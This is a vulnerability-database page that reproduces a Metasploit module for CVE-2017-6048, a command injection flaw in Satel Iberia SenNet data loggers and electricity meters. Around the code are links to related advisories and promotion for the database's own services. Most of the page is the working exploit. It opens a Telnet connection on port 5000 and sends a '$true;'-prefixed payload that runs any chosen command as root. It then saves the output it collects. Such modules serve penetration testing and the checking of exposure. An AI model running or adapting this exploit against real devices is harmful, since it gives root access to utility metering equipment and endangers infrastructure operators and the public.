Lucene search
K

Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability

🗓️ 06 Apr 2017 20:52:11Reported by Karn Ganeshen <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 39 Views

Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability exploitatio

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2017-6048
29 May 201815:50
circl
CNVD
Command Injection Vulnerability in Multiple Satel Products
17 May 201700:00
cnvd
CVE
CVE-2017-6048
19 May 201702:43
cve
Cvelist
CVE-2017-6048
19 May 201702:43
cvelist
ICS
Satel Iberia SenNet Data Logger and Electricity Meters
11 May 201700:00
ics
NVD
CVE-2017-6048
19 May 201703:29
nvd
OSV
CVE-2017-6048
19 May 201703:29
osv
Packet Storm
Satel Iberia SenNet Data Logger And Electricity Meters Command Injection
31 Aug 202400:00
packetstorm
Prion
Command injection
19 May 201703:29
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Telnet
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Satel Iberia SenNet Data Logger and Electricity Meters Command Injection Vulnerability',
      'Description' => %q{
        This module exploits an OS Command Injection vulnerability in Satel Iberia SenNet Data Loggers & Electricity Meters
        to perform arbitrary command execution as 'root'.
      },
      'References'     =>
        [
          [ 'CVE', '2017-6048' ],
          [ 'URL', 'https://ipositivesecurity.com/2017/04/07/sennet-data-logger-appliances-and-electricity-meters-multiple-vulnerabilties/' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-17-131-02' ]
        ],
      'Author' =>
        [
          'Karn Ganeshen <KarnGaneshen[at]gmail.com>'
        ],
      'DisclosureDate' => '2017-04-07',
      'License' => MSF_LICENSE,
      'DefaultOptions' => { 'VERBOSE' => true })
      )

    register_options(
      [
        Opt::RPORT(5000),
        OptInt.new('TIMEOUT', [true, 'Timeout for the Telnet probe', 30]),
        OptString.new('CMD', [true, 'Command(s) to run', 'id'])
      ], self.class
    )

    deregister_options('USERNAME', 'PASSWORD')
  end

  def run_host(ip)
    to = (datastore['TIMEOUT'].zero?) ? 30 : datastore['TIMEOUT']
    begin
      ::Timeout.timeout(to) do
        command = datastore['CMD']
        inject = "$true; #{command}"
        res = connect

        print_status("Sending command now - #{command}")

        sock.puts(inject)
        data = sock.get_once(-1, to)
        print_good("#{data}")

        loot_name = 'cmd-exec-log'
        loot_type = 'text/plain'
        loot_desc = 'Satel SenNet CMD Exec Dump'
        p = store_loot(loot_name, loot_type, datastore['RHOST'], data, loot_desc)
        print_good("File saved in: #{p}")
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
      print_error("#{rhost}:#{rport} - Connection Failed...")
      return false
    ensure
      disconnect
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation